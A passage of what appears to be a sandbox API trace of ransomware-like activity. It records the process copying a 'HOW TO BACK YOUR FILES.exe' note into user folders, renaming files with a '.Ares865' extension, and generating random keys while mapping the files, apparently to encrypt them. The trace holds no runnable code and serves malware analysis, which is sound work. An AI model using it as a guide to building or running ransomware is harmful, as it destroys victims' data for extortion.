[0106.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0106.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0106.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color") returned 56 [0106.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color" [0106.677] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.678] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.678] GetLastError () returned 0x0 [0106.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.678] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.678] CloseHandle (hObject=0x120) returned 1 [0106.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.679] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.679] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles" [0106.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0106.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles") returned 65 [0106.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles" [0106.679] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.679] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.680] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.680] GetLastError () returned 0x0 [0106.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.680] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.680] CloseHandle (hObject=0x120) returned 1 [0106.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.680] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.680] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.680] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat" [0106.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0106.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0106.681] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat") returned 58 [0106.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat" [0106.681] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.681] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.681] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.682] GetLastError () returned 0x0 [0106.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.682] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.682] CloseHandle (hObject=0x120) returned 1 [0106.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.682] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.682] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.682] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0" [0106.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0106.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0") returned 63 [0106.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0" [0106.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.683] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.683] GetLastError () returned 0x0 [0106.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.683] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.683] CloseHandle (hObject=0x120) returned 1 [0106.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.684] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.684] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.684] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache" [0106.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0106.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0106.684] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache") returned 69 [0106.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache" [0106.684] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.684] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.685] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.685] GetLastError () returned 0x0 [0106.685] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.685] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.685] CloseHandle (hObject=0x120) returned 1 [0106.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.685] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.685] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.685] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.686] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0106.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0106.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0106.686] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned 35 [0106.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0106.686] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.686] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.686] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.687] GetLastError () returned 0x0 [0106.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.687] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.687] CloseHandle (hObject=0x120) returned 1 [0106.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.687] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ffa2d20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ffa2d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.687] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.687] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.687] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.Ares865") returned 55 [0106.687] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0106.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.696] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=580) returned 1 [0106.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.697] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.698] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x124 [0106.700] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0106.700] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.701] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.701] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.701] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.701] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0106.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0106.704] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.Ares865") returned 55 [0106.704] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.ares865"), dwFlags=0x1) returned 1 [0106.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.713] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=486) returned 1 [0106.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.714] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.714] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.715] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.715] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.715] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x124 [0106.720] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0x190000 [0106.722] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.722] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.722] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.722] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.723] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.Ares865") returned 57 [0106.723] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.ares865"), dwFlags=0x1) returned 1 [0106.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 